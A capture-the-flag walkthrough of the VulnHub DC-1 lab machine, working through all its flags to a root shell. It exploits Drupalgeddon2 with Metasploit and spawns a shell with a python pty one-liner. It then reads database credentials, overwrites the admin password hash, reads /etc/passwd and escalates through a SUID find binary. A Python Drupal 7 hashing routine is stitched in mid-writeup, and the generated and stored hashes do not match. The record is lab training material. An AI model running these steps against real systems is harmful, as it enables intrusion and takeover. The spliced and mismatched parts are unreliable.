vulnhub-DC-1

Information gathering

As usual, start with an fscan scan.

└─# ./fscan -h 192.168.20.136

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
192.168.20.136:80 open
192.168.20.136:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://192.168.20.136 code:200 len:7627 title:Welcome to Drupal Site | Drupal Site
已完成 0/2 [-] ssh 192.168.20.136:22 root admin@123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 1/2 [-] ssh 192.168.20.136:22 root qwe123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 1/2 [-] ssh 192.168.20.136:22 root Aa12345. ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 1/2 [-] ssh 192.168.20.136:22 admin admin@123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 1/2 [-] ssh 192.168.20.136:22 admin a11111 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 2/2

Exploitation

Port 80 is running Drupal. Searching for vulnerabilities turns up a Drupal remote code execution vulnerability (CVE-2018-7600), but the exploit did not work. Fingerprinting shows the target is Drupal 7, so I moved to msf to exploit it.

msf6 > search Drupal

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution
1 exploit/unix/webapp/drupal_drupalgeddon2 2018-03-28 excellent Yes Drupal Drupalgeddon 2 Forms API Property Injection
2 exploit/multi/http/drupal_drupageddon 2014-10-15 excellent No Drupal HTTP Parameter Key/Value SQL Injection
3 auxiliary/gather/drupal_openid_xxe 2012-10-17 normal Yes Drupal OpenID External Entity Injection
4 exploit/unix/webapp/drupal_restws_exec 2016-07-13 excellent Yes Drupal RESTWS Module Remote PHP Code Execution
5 exploit/unix/webapp/drupal_restws_unserialize 2019-02-20 normal Yes Drupal RESTful Web Services unserialize() RCE
6 auxiliary/scanner/http/drupal_views_user_enum 2010-07-02 normal Yes Drupal Views Module Users Enumeration
7 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution


Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval

Using exploit/unix/webapp/drupal_drupalgeddon2 gets us in.

use 1
set RHOSTS 192.168.20.136
run
shell

Upgrade the shell to a proper TTY:

python -c "import pty;pty.spawn('/bin/bash')"

ls shows that flag1.txt is present.

cat flag1.txt
Every good CMS needs a config file - and so do you.

The hint points to a config file. The earlier ls showed a sites directory, and inside it is the configuration file.

www-data@DC-1:/var/www$ cd sites
cd sites
www-data@DC-1:/var/www/sites$ ls
ls
README.txt all default example.sites.php
www-data@DC-1:/var/www/sites$ cd default
cd default
www-data@DC-1:/var/www/sites/default$ ls
ls
default.settings.php files settings.php
www-data@DC-1:/var/www/sites/default$ cat settings.php
cat settings.php
<?php

/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/

$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);

flag2 is here, and the database username and password are exposed as well. Try logging in to the database.

mysql -udbuser -pR0ck3t
mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| drupaldb |
+--------------------+
2 rows in set (0.02 sec)
mysql> use drupaldb;
use drupaldb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-----------------------------+
| Tables_in_drupaldb |
+-----------------------------+
| actions |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_update |
| cache_views |
| cache_views_data |
| comment |
| ctools_css_cache |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_comment_body |
| field_data_field_image |
| field_data_field_tags |
| field_revision_body |
| field_revision_comment_body |
| field_revision_field_image |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_comment_statistics |
| node_revision |
| node_type |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
+-----------------------------+
80 rows in set (0.00 sec)

Tampering with the database

There is a users table; look at the users.

mysql> select * from users;
select * from users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name | pass | mail | theme | signature | signature_format | created | access | login | status | timezone | language | picture | init | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| 0 | | | | | | NULL | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com | | | NULL | 1550581826 | 1550583852 | 1550582362 | 1 | Australia/Melbourne | | 0 | admin@example.com | b:0; |
| 2 | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org | | | filtered_html | 1550581952 | 1550582225 | 1550582225 | 1 | Australia/Melbourne | | 0 | fred@example.org | b:0; |
| 3 | 1 | $S$Dd.OLUkeleQbecNnYq0gJUdyRemoXxiU2Qu1WwQoJ4BIOyAw7LH. | aaa@qq.com | | | filtered_html | 1731440313 | 0 | 0 | 0 | Australia/Melbourne | | 0 | aaa@qq.com | NULL |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
4 rows in set (0.00 sec)

The admin user's password is there, but it is stored hashed (obviously a hash at a glance). I ran hashcat against it for a long time without cracking it, so I guessed there might be a hashing script on the box.

www-data@DC-1:/var/www/sites/default$ find / -name "*hash*"
find / -name "*hash*"
/etc/dictionaries-common/default.hash
/boot/grub/hashsum.mod
/var/www/scripts/password-hash.sh

Sure enough there is. Run it directly to generate a hash for admin:

www-data@DC-1:/var/www$ php scripts/password-hash.sh admin
php scripts/password-hash.sh admin

password: admin hash: $S$Dx2t32N4VwlcrmoJ7EZDaq96snnt4p1VEt0CFhN.r1osEN0DkKpx

Change the password in the database:

mysql> update users set pass='$S$DyyA5HnUonyq8xJJZeWKGIsIxaDpzGM6jbKqPiERZ/lLMnsWkUB.' where name='admin';
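The `$S$` hashes above, and the slow hashcat run, come from Drupal 7's password scheme. The following is an added example, not code from the original writeup or from Drupal itself: a Python re-implementation of the algorithm in Drupal 7's includes/password.inc that lets a defender parse a stored hash and verify which password it corresponds to.

```python
import hashlib
import hmac
import os

# Drupal 7 password hashes (includes/password.inc) look like
# "$S$" + 1 char encoding log2(rounds) + 8-char salt + 43 chars of hash,
# where the hash is SHA-512 iterated 2**rounds times (default 2**15 = 32768).
# That iteration count is what makes cracking the admin hash slow.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55
DEFAULT_COUNT_LOG2 = 15


def _b64(data: bytes) -> str:
    """Drupal's base64 variant: little-endian 3-byte groups, phpass alphabet."""
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        value = int.from_bytes(chunk, "little")
        out.extend(ITOA64[(value >> (6 * k)) & 0x3F] for k in range(len(chunk) + 1))
    return "".join(out)


def parse_setting(stored: str):
    """Return (count_log2, salt) from the 12-character setting prefix."""
    if len(stored) < 12 or stored[:3] != "$S$":
        raise ValueError("not a Drupal 7 SHA-512 hash")
    count_log2 = ITOA64.index(stored[3])
    if not 7 <= count_log2 <= 30:  # DRUPAL_MIN_HASH_COUNT / DRUPAL_MAX_HASH_COUNT
        raise ValueError("iteration count out of range")
    return count_log2, stored[4:12]


def generate_setting(count_log2: int = DEFAULT_COUNT_LOG2) -> str:
    """Fresh setting prefix with a random 8-character salt, as Drupal does."""
    return "$S$" + ITOA64[count_log2] + _b64(os.urandom(6))


def drupal7_hash(password: str, setting: str) -> str:
    """Equivalent of _password_crypt('sha512', password, setting)."""
    count_log2, salt = parse_setting(setting)
    pw = password.encode()
    digest = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.sha512(digest + pw).digest()
    return (setting[:12] + _b64(digest))[:HASH_LENGTH]


def verify_password(password: str, stored: str) -> bool:
    """Same check Drupal performs at login; use it to confirm a hash in the DB."""
    return hmac.compare_digest(drupal7_hash(password, stored), stored)
```

Because each hash carries its own random salt, two runs of password-hash.sh for the same password give different strings; verify_password is the right way to confirm that a stored hash matches a given password.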

Log in directly with admin:admin and flag3 is there:

Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

The hint mentions passwd and shadow; take a look.

www-data@DC-1:/var/www$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash

There is a flag4 user; grab flag4:

www-data@DC-1:/var/www$ cd /home/flag4
cd /home/flag4
www-data@DC-1:/home/flag4$ ls
ls
flag4.txt
www-data@DC-1:/home/flag4$ cat flag*
cat flag*
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy. Or maybe it is?

Privilege escalation

The hint points to root, so it's time for privilege escalation. sudo is not present, so try SUID binaries next.

www-data@DC-1:/home/flag4$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs

find is SUID, which allows privilege escalation.

www-data@DC-1:/var/www$ find . -exec /bin/sh \;
find . -exec /bin/sh \;
# whoami
whoami
root
# cd /root
cd /root
# ls
ls
thefinalflag.txt
# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7

That completes the box. It is fairly simple and all basics; the main points tested are exploiting a known vulnerability and SUID privilege escalation.